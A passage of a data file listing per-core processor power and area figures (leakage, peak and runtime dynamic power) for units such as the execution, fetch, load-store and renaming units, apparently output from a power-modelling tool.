'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.279899,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0111519,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0822257,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.373277,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.11806,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.130955,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.305546,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.753334,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.271238,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.437498,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.220834,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.92957,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.194722,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.5049,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.142321,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.011377,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.129421,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0841396,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.271742,
'Execution Unit/Register Files/Runtime Dynamic': 0.0955165,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.3054,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.68688,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.42289,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000483882,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000483882,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000424306,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000165812,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120867,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00260074,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00453774,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0808855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.14501,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.166366,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.274724,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.61323,
'Instruction Fetch Unit/Runtime Dynamic': 0.529113,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0297673,
'L2/Runtime Dynamic': 0.00664102,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.49339,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.08708,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0729957,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0729956,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.83809,
'Load Store Unit/Runtime Dynamic': 1.52007,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.179995,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.359989,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0638808,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0643252,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.319898,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0272806,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.585743,
'Memory Management Unit/Runtime Dynamic': 0.0916058,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.1612,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.374381,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0167937,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.131313,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.522487,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.09281,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 2.83407e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202691,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01201e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.141275,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.227872,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.115022,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.48417,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.161576,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13902,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 1.91191e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00592573,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0428516,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0438244,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0428535,
'Execution Unit/Register Files/Runtime Dynamic': 0.0497501,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0902771,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.232029,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.37402,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00203189,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00203189,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0018282,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000739682,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000629541,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00652152,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173941,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0421295,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.67979,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.15867,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.143091,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.02837,
'Instruction Fetch Unit/Runtime Dynamic': 0.367806,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0328972,
'L2/Runtime Dynamic': 0.00768972,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.51334,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.62472,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0412887,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0412888,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.70831,
'Load Store Unit/Runtime Dynamic': 0.869631,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.101811,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.203622,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.036133,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0364951,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.16662,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0264029,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.384799,
'Memory Management Unit/Runtime Dynamic': 0.062898,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.8829,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
